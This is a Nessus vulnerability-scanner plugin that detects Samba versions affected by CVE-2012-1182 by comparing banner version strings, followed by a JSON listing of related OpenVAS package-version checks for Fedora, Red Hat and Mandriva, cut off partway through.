ID SAMBA_RPC_MULTIPLE_BUFFER_OVERFLOWS.NASL Type nessus Reporter This script is Copyright (C) 2012-2018 Tenable Network Security, Inc. Modified 2018-11-15T00:00:00
Description
According to its banner, the version of Samba 3.x running on the remote host is earlier than 3.6.4 / 3.5.14 / 3.4.16. It is, therefore, affected by multiple heap-based buffer overflow vulnerabilities.
An error in the DCE/RPC IDL (PIDL) compiler causes the RPC handling code it generates to contain multiple heap-based buffer overflow vulnerabilities. This generated code can allow a remote, unauthenticated attacker to use malicious RPC calls to crash the application and possibly execute arbitrary code as the root user.
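Note that Nessus has not tried to exploit this issue or to determine whether one of the associated patches has been applied. The finding rests solely on the version string in the SMB banner, so a host carrying a patch that does not change the version number is still reported; confirm the result against the installed package or build before treating it as a true positive.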
#
# (C) Tenable Network Security, Inc.
#
include("compat.inc");
# Registration block: executed when `description` is set, i.e. when the
# plugin is loaded for its metadata. It only declares identifiers, report
# text, risk scoring and run-time prerequisites, then exits, so none of the
# check logic after the closing brace runs in this pass.
if (description)
{
# Plugin identity and revision.
script_id(58662);
script_version ("1.14");
script_cvs_date("Date: 2018/11/15 20:50:24");
# Cross-references used to correlate this finding with other feeds:
# one CVE, one Bugtraq ID and nine ZDI advisories.
script_cve_id("CVE-2012-1182");
script_bugtraq_id(52973);
script_xref(name:"ZDI", value:"ZDI-12-061");
script_xref(name:"ZDI", value:"ZDI-12-062");
script_xref(name:"ZDI", value:"ZDI-12-063");
script_xref(name:"ZDI", value:"ZDI-12-064");
script_xref(name:"ZDI", value:"ZDI-12-068");
script_xref(name:"ZDI", value:"ZDI-12-069");
script_xref(name:"ZDI", value:"ZDI-12-070");
script_xref(name:"ZDI", value:"ZDI-12-071");
script_xref(name:"ZDI", value:"ZDI-12-072");
script_name(english:"Samba 3.x < 3.6.4 / 3.5.14 / 3.4.16 RPC Multiple Buffer Overflows");
script_summary(english:"Checks version of Samba");
# Report text. The string literals span several source lines; their line
# breaks are part of the value shown in the report.
script_set_attribute(attribute:"synopsis", value:
"The remote Samba server is affected by multiple buffer overflow
vulnerabilities.");
script_set_attribute(attribute:"description", value:
"According to its banner, the version of Samba 3.x running on the
remote host is earlier than 3.6.4 / 3.5.14 / 3.4.16. It is,
therefore, affected by multiple heap-based buffer overflow
vulnerabilities.
An error in the DCE/RPC IDL (PIDL) compiler causes the RPC handling
code it generates to contain multiple heap-based buffer overflow
vulnerabilities. This generated code can allow a remote,
unauthenticated attacker to use malicious RPC calls to crash the
application and possibly execute arbitrary code as the root user.
Note that Nessus has not actually tried to exploit this issue or
otherwise determine if one of the associated patches has been
applied.");
script_set_attribute(attribute:"solution", value:
"Either install the appropriate patch referenced in the project's
advisory or upgrade to 3.6.4 / 3.5.14 / 3.4.16 or later.");
# CVSS v2 base vector: network reachable, low complexity, no authentication,
# complete loss of confidentiality, integrity and availability.
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
# CVSS v2 temporal vector: functional exploit code exists (E:F), an official
# fix is available (RL:OF), and the report is confirmed (RC:C).
script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
# Exploit-availability flags. They record that public exploit modules exist
# (Core Impact, Metasploit, CANVAS), which raises remediation priority; the
# plugin itself does not use any of them.
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"exploit_framework_core", value:"true");
script_set_attribute(attribute:"metasploit_name", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');
script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
script_set_attribute(attribute:"canvas_package", value:'CANVAS');
# Advisory references: the ZDI write-ups, the Samba project advisory and the
# release notes of the three fixed versions.
script_set_attribute(attribute:"see_also", value:"https://www.zerodayinitiative.com/advisories/ZDI-12-061/");
script_set_attribute(attribute:"see_also", value:"https://www.zerodayinitiative.com/advisories/ZDI-12-062/");
script_set_attribute(attribute:"see_also", value:"https://www.zerodayinitiative.com/advisories/ZDI-12-063/");
script_set_attribute(attribute:"see_also", value:"https://www.zerodayinitiative.com/advisories/ZDI-12-064/");
script_set_attribute(attribute:"see_also", value:"https://www.zerodayinitiative.com/advisories/ZDI-12-068/");
script_set_attribute(attribute:"see_also", value:"https://www.zerodayinitiative.com/advisories/ZDI-12-069/");
script_set_attribute(attribute:"see_also", value:"https://www.zerodayinitiative.com/advisories/ZDI-12-070/");
script_set_attribute(attribute:"see_also", value:"https://www.zerodayinitiative.com/advisories/ZDI-12-071/");
script_set_attribute(attribute:"see_also", value:"https://www.zerodayinitiative.com/advisories/ZDI-12-072/");
script_set_attribute(attribute:"see_also", value:"https://www.samba.org/samba/security/CVE-2012-1182.html");
script_set_attribute(attribute:"see_also", value:"https://www.samba.org/samba/history/samba-3.6.4.html");
script_set_attribute(attribute:"see_also", value:"https://www.samba.org/samba/history/samba-3.5.14.html");
script_set_attribute(attribute:"see_also", value:"https://www.samba.org/samba/history/samba-3.4.16.html");
# Patch links
script_set_attribute(attribute:"see_also", value:"https://www.samba.org/samba/history/security.html");
# Disclosure timeline: the fix was published the same day as the
# vulnerability, the plugin one day later.
script_set_attribute(attribute:"vuln_publication_date", value:"2012/04/10");
script_set_attribute(attribute:"patch_publication_date", value:"2012/04/10");
script_set_attribute(attribute:"plugin_publication_date", value:"2012/04/11");
# Marked as a potential vulnerability: the result is inferred from a version
# string, not demonstrated. This pairs with the Settings/ParanoidReport key
# required below.
script_set_attribute(attribute:"potential_vulnerability", value:"true");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:samba:samba");
script_end_attributes();
# Information-gathering category; the check body after this block only
# reads knowledge-base items and compares version numbers.
script_category(ACT_GATHER_INFO);
script_family(english:"Misc.");
script_copyright(english:"This script is Copyright (C) 2012-2018 Tenable Network Security, Inc.");
# Prerequisites: smb_nativelanman.nasl must have run first (presumably it is
# what populates SMB/NativeLanManager - confirm against that plugin), the
# host must already be identified as Samba, and the scan must have paranoid
# reporting enabled.
script_dependencies("smb_nativelanman.nasl");
script_require_keys("SMB/NativeLanManager", "SMB/samba", "Settings/ParanoidReport");
exit(0);
}
include("global_settings.inc");
include("audit.inc");
include("misc_func.inc");
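# Version check for CVE-2012-1182, driven entirely by the SMB banner.
#
# The banner cannot show whether a vendor back-ported the fix, so the check
# only runs when the scan is configured for paranoid reporting; otherwise it
# audits out. Treat every hit as "needs confirmation against the installed
# package", not as proof that the host is exploitable.
if (report_paranoia < 2) audit(AUDIT_PARANOID);

port = get_kb_item("SMB/transport");
# Fall back to the standard SMB-over-TCP port when the transport was not
# recorded, so the message below and the report are never attached to an
# empty port value.
if (!port) port = 445;

lanman = get_kb_item_or_exit("SMB/NativeLanManager");
if ("Samba " >!< lanman) exit(0, "The SMB service listening on port "+port+" is not running Samba.");

# Strip the product name and turn the dotted version into integers.
# NOTE(review): a banner with fewer than three numeric components leaves
# ver[2] unset, and a component with a distro suffix goes through int()
# as-is - confirm how both cases compare below before relying on the result.
version = lanman - 'Samba ';
ver = split(version, sep:'.', keep:FALSE);
for (i=0; i<max_index(ver); i++)
  ver[i] = int(ver[i]);

# Patches have been released for 3.x < 3.4, but
# those patches do not change the version number.
# Every 3.x release older than 3.4 is therefore reported, whether or not it
# was patched; only the 3.4, 3.5 and 3.6 branches have a fixed version that
# is visible in the banner.
if (
  ver[0] == 3 &&
  (
    ver[1] < 4 ||
    (ver[1] == 4 && ver[2] < 16) ||
    (ver[1] == 5 && ver[2] < 14) ||
    (ver[1] == 6 && ver[2] < 4)
  )
)
{
  if (report_verbosity > 0)
  {
    report = '\n Installed version : ' + version +
'\n Fixed version : 3.6.4 / 3.5.14 / 3.4.16\n';
    security_hole(port:port, extra:report);
  }
  else security_hole(port);
  exit(0);
}
else audit(AUDIT_INST_VER_NOT_VULN, "Samba", version);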
{"openvas": [{"lastseen": "2018-01-06T13:07:07", "description": "Check for the Version of samba4", "cvss3": {}, "published": "2012-05-04T00:00:00", "type": "openvas", "title": "Fedora Update for samba4 FEDORA-2012-6349", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2018-01-05T00:00:00", "id": "OPENVAS:864213", "href": "http://plugins.openvas.org/nasl.php?oid=864213", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for samba4 FEDORA-2012-6349\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"samba4 on Fedora 15\";\ntag_insight = \"Samba 4 is the ambitious next version of the Samba suite that is being\n developed in parallel to the stable 3.0 series. 
The main emphasis in\n this branch is support for the Active Directory logon protocols used\n by Windows 2000 and above.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-May/079715.html\");\n script_id(864213);\n script_version(\"$Revision: 8295 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-05 07:29:18 +0100 (Fri, 05 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-05-04 10:46:43 +0530 (Fri, 04 May 2012)\");\n script_cve_id(\"CVE-2012-1182\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2012-6349\");\n script_name(\"Fedora Update for samba4 FEDORA-2012-6349\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of samba4\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC15\")\n{\n\n if ((res = isrpmvuln(pkg:\"samba4\", rpm:\"samba4~4.0.0~26.alpha11.fc15.6\", rls:\"FC15\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 10.0, "vector": 
"AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:56", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-04-11T00:00:00", "type": "openvas", "title": "RedHat Update for samba RHSA-2012:0465-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2018-11-23T00:00:00", "id": "OPENVAS:1361412562310870581", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870581", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for samba RHSA-2012:0465-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2012-April/msg00002.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870581\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-11 10:59:22 +0530 (Wed, 11 Apr 2012)\");\n script_cve_id(\"CVE-2012-1182\");\n script_xref(name:\"RHSA\", value:\"2012:0465-01\");\n script_name(\"RedHat Update for samba RHSA-2012:0465-01\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'samba'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_5\");\n script_tag(name:\"affected\", value:\"samba on Red Hat Enterprise Linux (v. 
5 server)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"Samba is an open-source implementation of the Server Message Block (SMB) or\n Common Internet File System (CIFS) protocol, which allows PC-compatible\n machines to share files, printers, and other information.\n\n A flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler, used\n to generate code to handle RPC calls, resulted in multiple buffer overflows\n in Samba. A remote, unauthenticated attacker could send a specially-crafted\n RPC request that would cause the Samba daemon (smbd) to crash or, possibly,\n execute arbitrary code with the privileges of the root user.\n (CVE-2012-1182)\n\n Users of Samba are advised to upgrade to these updated packages, which\n contain a backported patch to resolve this issue. After installing this\n update, the smb service will be restarted automatically.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"libsmbclient\", rpm:\"libsmbclient~3.0.33~3.39.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient-devel\", rpm:\"libsmbclient-devel~3.0.33~3.39.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba\", rpm:\"samba~3.0.33~3.39.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~3.0.33~3.39.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-common\", rpm:\"samba-common~3.0.33~3.39.el5_8\", 
rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-debuginfo\", rpm:\"samba-debuginfo~3.0.33~3.39.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-swat\", rpm:\"samba-swat~3.0.33~3.39.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-08T12:57:49", "description": "Check for the Version of samba", "cvss3": {}, "published": "2012-08-03T00:00:00", "type": "openvas", "title": "Mandriva Update for samba MDVSA-2012:055 (samba)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2018-01-08T00:00:00", "id": "OPENVAS:831574", "href": "http://plugins.openvas.org/nasl.php?oid=831574", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for samba MDVSA-2012:055 (samba)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability has been found and corrected in samba:\n\n The RPC code generator in Samba 3.x before 3.4.16, 3.5.x before\n 3.5.14, and 3.6.x before 3.6.4 does not implement validation of an\n array length in a manner consistent with validation of array memory\n allocation, which allows remote attackers to execute arbitrary code\n via a crafted RPC call (CVE-2012-1182).\n\n The updated packages have been patched to correct this issue.\";\n\ntag_affected = \"samba on Mandriva Linux 2011.0,\n Mandriva Enterprise Server 5.2,\n Mandriva Linux 2010.1\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://www.mandriva.com/en/support/security/advisories/?name=MDVSA-2012:055\");\n script_id(831574);\n script_version(\"$Revision: 8313 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-08 08:02:11 +0100 (Mon, 08 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-03 09:50:22 +0530 (Fri, 03 Aug 2012)\");\n script_cve_id(\"CVE-2012-1182\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"MDVSA\", value: \"2012:055\");\n script_name(\"Mandriva Update for samba MDVSA-2012:055 (samba)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of samba\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n 
script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2011.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"libnetapi0\", rpm:\"libnetapi0~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnetapi-devel\", rpm:\"libnetapi-devel~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0\", rpm:\"libsmbclient0~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-devel\", rpm:\"libsmbclient0-devel~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-static-devel\", rpm:\"libsmbclient0-static-devel~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbsharemodes0\", rpm:\"libsmbsharemodes0~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbsharemodes-devel\", rpm:\"libsmbsharemodes-devel~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0\", rpm:\"libwbclient0~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isrpmvuln(pkg:\"libwbclient-devel\", rpm:\"libwbclient-devel~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mount-cifs\", rpm:\"mount-cifs~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss_wins\", rpm:\"nss_wins~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-common\", rpm:\"samba-common~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-doc\", rpm:\"samba-doc~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-domainjoin-gui\", rpm:\"samba-domainjoin-gui~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-server\", rpm:\"samba-server~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-swat\", rpm:\"samba-swat~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind\", rpm:\"samba-winbind~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64netapi0\", rpm:\"lib64netapi0~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64netapi-devel\", rpm:\"lib64netapi-devel~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbclient0\", 
rpm:\"lib64smbclient0~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbclient0-devel\", rpm:\"lib64smbclient0-devel~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbclient0-static-devel\", rpm:\"lib64smbclient0-static-devel~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbsharemodes0\", rpm:\"lib64smbsharemodes0~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbsharemodes-devel\", rpm:\"lib64smbsharemodes-devel~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64wbclient0\", rpm:\"lib64wbclient0~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64wbclient-devel\", rpm:\"lib64wbclient-devel~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_mes5.2\")\n{\n\n if ((res = isrpmvuln(pkg:\"libnetapi0\", rpm:\"libnetapi0~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnetapi-devel\", rpm:\"libnetapi-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0\", rpm:\"libsmbclient0~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-devel\", rpm:\"libsmbclient0-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isrpmvuln(pkg:\"libsmbclient0-static-devel\", rpm:\"libsmbclient0-static-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbsharemodes0\", rpm:\"libsmbsharemodes0~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbsharemodes-devel\", rpm:\"libsmbsharemodes-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtalloc1\", rpm:\"libtalloc1~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtalloc-devel\", rpm:\"libtalloc-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtdb1\", rpm:\"libtdb1~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtdb-devel\", rpm:\"libtdb-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0\", rpm:\"libwbclient0~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient-devel\", rpm:\"libwbclient-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mount-cifs\", rpm:\"mount-cifs~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss_wins\", rpm:\"nss_wins~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~3.3.12~0.9mdvmes5.2\", 
